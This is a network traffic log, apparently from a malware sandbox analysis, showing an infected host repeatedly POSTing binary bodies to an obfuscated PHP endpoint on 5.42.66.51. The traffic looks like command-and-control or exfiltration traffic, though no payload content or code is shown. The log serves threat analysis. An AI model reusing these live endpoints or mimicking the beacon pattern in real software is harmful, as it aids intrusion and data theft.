                                                                                                Oct 11, 2024 20:39:07.458498955 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:07.810586929 CEST | 2156 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:08.149085045 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:08.283118010 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                77 | 192.168.2.5 | 50062 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:08.303364038 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:08.654578924 CEST | 2552 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:08.986346006 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:09.115611076 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                78 | 192.168.2.5 | 50063 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:09.151153088 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:09.498414040 CEST | 2140 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:09.841893911 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:09.977333069 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                79 | 192.168.2.5 | 50064 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:10.555877924 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:10.926929951 CEST | 2552 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:11.748049021 CEST | 1236 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:11.969885111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:11.970293045 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:11.970398903 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                80 | 192.168.2.5 | 50065 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:11.976736069 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:12.334964991 CEST | 2156 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:12.739557981 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:12.792818069 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                81 | 192.168.2.5 | 50066 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:11.976803064 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:12.335028887 CEST | 2552 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:12.739603043 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:12.792865038 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                82 | 192.168.2.5 | 50067 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:13.527409077 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:13.873146057 CEST | 2552 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:14.214337111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:14.343511105 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                83 | 192.168.2.5 | 50068 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:13.598022938 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:13.953983068 CEST | 2156 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:14.273142099 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:14.404541016 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                84 | 192.168.2.5 | 50069 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:15.176419973 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:15.529434919 CEST | 2128 | OUT | (payload data)
                                                                                                Oct 11, 2024 20:39:15.868525028 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:16.001415014 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.2.5 | 50070 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:15.195111990 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:15.544970989 CEST | 2552 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:15.888916016 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:16.019853115 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
86 | 192.168.2.5 | 50071 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:16.754615068 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:17.107522011 CEST | 2156 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:20.457267046 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:20.591181040 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.2.5 | 50072 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:16.788711071 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:17.138820887 CEST | 2552 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:17.494836092 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:17.628961086 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
Oct 11, 2024 20:39:17.910679102 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.2.5 | 50073 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:18.148230076 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:18.507647038 CEST | 2552 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:18.909547091 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:19.405081987 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
Oct 11, 2024 20:39:19.405371904 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
Oct 11, 2024 20:39:19.409501076 CEST | 225 | IN | HTTP/1.1 100 Continue
Data Ascii: HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.2.5 | 50074 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:20.143306971 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:20.498450994 CEST | 2552 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:20.825778961 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:20.959110975 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
90 | 192.168.2.5 | 50075 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:21.480437994 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:21.826463938 CEST | 2156 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:22.174992085 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:22.316065073 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:22 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.2.5 | 50076 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:22.262145042 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:22.610049963 CEST | 2552 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:25.955549002 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:26.083190918 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:25 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.2.5 | 50077 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:23.199546099 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
Oct 11, 2024 20:39:23.545025110 CEST | 2156 | OUT | Data: POST body (application/octet-stream)
Oct 11, 2024 20:39:23.878871918 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:24.004137039 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                93 | 192.168.2.5 | 50078 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:24.675868988 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:25.029625893 CEST | 2140 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:25.359827042 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:25.491622925 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:25 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                94 | 192.168.2.5 | 50079 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:26.146728992 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:26.504565954 CEST | 2156 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:29.857270956 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:29.997654915 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                95 | 192.168.2.5 | 50080 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:26.874121904 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:27.232511997 CEST | 2552 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:27.586719036 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:27.721393108 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                96 | 192.168.2.5 | 50081 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:28.563692093 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:28.920068979 CEST | 2552 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:29.250142097 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:29.380014896 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                97 | 192.168.2.5 | 50082 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:29.526647091 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:29.873183012 CEST | 2552 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:30.414608002 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:30.415333033 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:30 GMT
